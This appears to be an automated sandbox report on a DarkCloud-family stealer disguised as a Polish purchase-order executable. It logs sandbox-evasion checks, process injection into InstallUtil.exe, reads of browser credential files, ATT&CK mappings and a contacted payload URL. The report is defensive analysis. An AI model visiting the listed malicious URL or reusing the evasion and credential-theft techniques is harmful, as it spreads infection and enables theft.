Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -96094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -95984s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -95875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -95766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -95656s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 99765	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 99651	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 99547	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 99422	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 99312	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 99203	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 99093	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 98984	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 98875	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 98761	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 98613	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 98499	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 98361	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 98178	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 98000	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 97890	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 97781	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 97667	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 97562	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 97453	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 97343	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 97234	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 97125	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 97015	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 96906	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 96796	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 96687	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 96578	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 96468	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 96359	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 96250	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 96140	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 96031	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 95919	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 95812	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 99860	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 99735	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 99406	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 99297	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 99188	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 99063	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 98953	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 98843	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 98734	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 98625	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 98516	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 98391	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 98281	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 98172	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 98062	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 97953	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 97844	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 97734	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 97625	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 97516	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 97403	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 97281	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 97172	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 97057	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 96891	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 96578	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 96447	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 96328	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 96219	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 96094	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 95984	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 95875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 95766	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 95656	Jump to behavior

Source: WebData.2.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: WebData.2.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: WebData.2.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: WebData.2.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: WebData.2.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: WebData.2.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: InstallUtil.exe, 00000002.00000002.3305635075.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3306426620.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3306652645.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3305781323.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000005.00000002.2231461639.0000017F4AC12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: InstallUtil.exe, 00000007.00000002.3306652645.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBn
Source: WebData.2.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: WebData.2.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: WebData.2.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: WebData.2.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: WebData.2.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: WebData.2.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: WebData.2.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: WebData.2.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: WebData.2.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2111378125.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2286664528.000000000119C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: WebData.2.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: WebData.2.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: WebData.2.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: WebData.2.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: WebData.2.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: WebData.2.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: WebData.2.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: WebData.2.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: WebData.2.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: WebData.2.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: WebData.2.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: WebData.2.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: FieldNames.exe, 00000006.00000002.2288985162.0000000002E9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: WebData.2.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: FieldNames.exe, 00000006.00000002.2288985162.0000000002E9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: WebData.2.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: WebData.2.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: WebData.2.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\FieldNames.exe "C:\Users\user\AppData\Roaming\FieldNames.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Queries volume information: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Queries volume information: C:\Users\user\AppData\Roaming\FieldNames.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DarkCloud

Source: Yara match	File source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3304177579.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2306805654.0000000004018000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2118042555.000000000412F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2118042555.0000000004227000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe PID: 5760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FieldNames.exe PID: 1272, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7108, type: MEMORYSTR

Yara detected Generic Dropper

Source: Yara match	File source: Process Memory Space: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe PID: 5760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FieldNames.exe PID: 1272, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Remote Access Functionality

Yara detected DarkCloud

Source: Yara match	File source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3304177579.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2306805654.0000000004018000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2118042555.000000000412F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2118042555.0000000004227000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe PID: 5760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FieldNames.exe PID: 1272, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7108, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	1 Windows Management Instrumentation	111 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	12 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	2 Registry Run Keys / Startup Folder	2 Software Packing	NTDS	11 Security Software Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\FieldNames.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://stackoverflow.com/q/14436606/23354	0%	URL Reputation	safe
https://stackoverflow.com/q/11564914/23354;	0%	URL Reputation	safe
https://stackoverflow.com/q/2152978/23354	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
showip.net	162.55.60.2	true	false		unknown
erkasera.com	188.132.193.46	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://erkasera.com/ruurew/Cwfuvfaf.wav	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://showip.net/dF	InstallUtil.exe, 00000007.00000002.3305781323.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://showip.net/#(	InstallUtil.exe, 00000007.00000002.3306652645.0000000000D0F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://127.0.0.1:	PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, FieldNames.exe.0.dr	false		unknown
https://erkasera.com	PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.0000000003061000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1	InstallUtil.exe, 00000007.00000002.3306909563.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3307042263.0000000000D5D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://github.com/mgravell/protobuf-neti	PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://stackoverflow.com/q/14436606/23354	PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.0000000002E9C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/mgravell/protobuf-netJ	PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2306805654.000000000461F000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://showip.net/X	InstallUtil.exe, 00000002.00000002.3305635075.0000000000A97000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://stackoverflow.com/q/11564914/23354;	PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://stackoverflow.com/q/2152978/23354	PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://showip.neta	InstallUtil.exe, 00000007.00000002.3305781323.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://showip.net#	InstallUtil.exe, 00000007.00000002.3305781323.0000000000CC6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://showip.netF	InstallUtil.exe, 00000002.00000002.3305635075.0000000000A97000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://github.com/mgravell/protobuf-net	PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://showip.net/%Y	InstallUtil.exe, 00000002.00000002.3306426620.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://erkasera.com/ruurew/Cwfuvfaf.wav1B4MrP3veGRoRMM0tnPgU/Q==	PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, FieldNames.exe.0.dr	false		unknown
http://showip.net/;	InstallUtil.exe, 00000002.00000002.3305635075.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.0000000003061000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://showip.net/h	InstallUtil.exe, 00000007.00000002.3305781323.0000000000CC6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://showip.net/	InstallUtil.exe, 00000002.00000002.3305635075.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3305635075.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3305781323.0000000000CC6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3305781323.0000000000C78000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3305781323.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
